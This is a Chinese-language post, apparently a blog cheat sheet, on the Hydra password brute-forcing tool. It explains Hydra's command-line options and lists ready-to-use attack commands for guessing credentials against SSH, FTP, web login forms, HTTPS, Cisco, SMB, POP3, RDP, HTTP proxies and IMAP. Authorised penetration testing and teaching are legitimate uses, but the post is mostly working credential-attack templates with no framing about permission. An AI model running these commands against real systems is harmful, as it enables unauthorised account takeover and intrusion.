破解

破解

关注
发信
关注(28)粉丝(399)

Hydra暴力破解工具

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

 

参数解释如下。

  • -R
    • 继续从上一次进度接着破解
  • -S
    • 采用SSL连接
  • -s <port>
    • 可通过这个参数指定非默认端口
  • -l <LOGIN>
    • 指定特定的用户名进行爆破
  • -L <FILE>
    • 指定用户名字典
  • -p <PASS>
    • 指定特定的密码进行爆破
  • -P <FILE>
    • 指定密码字典
  • -e <ns>
    • n:空密码试探;s:使用指定的用户名和密码试探
  • -C <FILE>
    • 使用冒号分割格式,如"admin:123456"来代替-L/-P
  • -M <FILE>
    • 指定目标列表一行一条
  • -o <FILE>
    • 指定结果输出文件
  • -f
    • 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
  • -t <TASKS>
    • 设置线程数,默认是16个线程。
  • -w <TIMME>
    • 设置最大超时时间,单位为秒,默认是30s。
  • -v/-V
    • 显示详细过程
  • Server
    • 目标IP
  • Servicee
    • 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

下面是一些常用服务的破解命令。

1、破解ssh:

hydra -l 用户名 -P 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -P 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用户名 -P 密码字典 -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

  

3、GET/POST方式提交,破解web登录:

hydra -l 用户名 -P password_file 127.0.0.1 http-get-form/http-post-form "vulnerabilities/brute/:username=^USER^&password=^PASS^&submit=login:F=Username and/or password incorrect.:H=Cookie: security=low;PHPSESSID=xxxxxxx"

说明:引号内的部分是自行构建的参数,这些参数用冒号隔开。第一个参数是接受收据的地址;第二个参数是页面接受的数据,需要破解的参数用^符号包起来;第三个参数是判断破解是否成功的标志(F代表错误,S代表正确);第四个参数是本次请求中的head cookie。

4、破解https:

hydra -m /index.php -l muts -P pass.txt 127.0.0.1 https

  

5、破解teamspeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

  

6、破解cisco:

hydra -P pass.txt ip cisco
hydra -m cloud -P pass.txt ip cisco-enable

  

7、破解smb:

hydra -l administrator -P pass.txt ip smb

8、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

9、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

10、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://ip

11、破解imap:

hydra -L user.txt -p secret ip imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

  

01-04 18:22
Powered by LMLPHP ©2025 破解 0.076370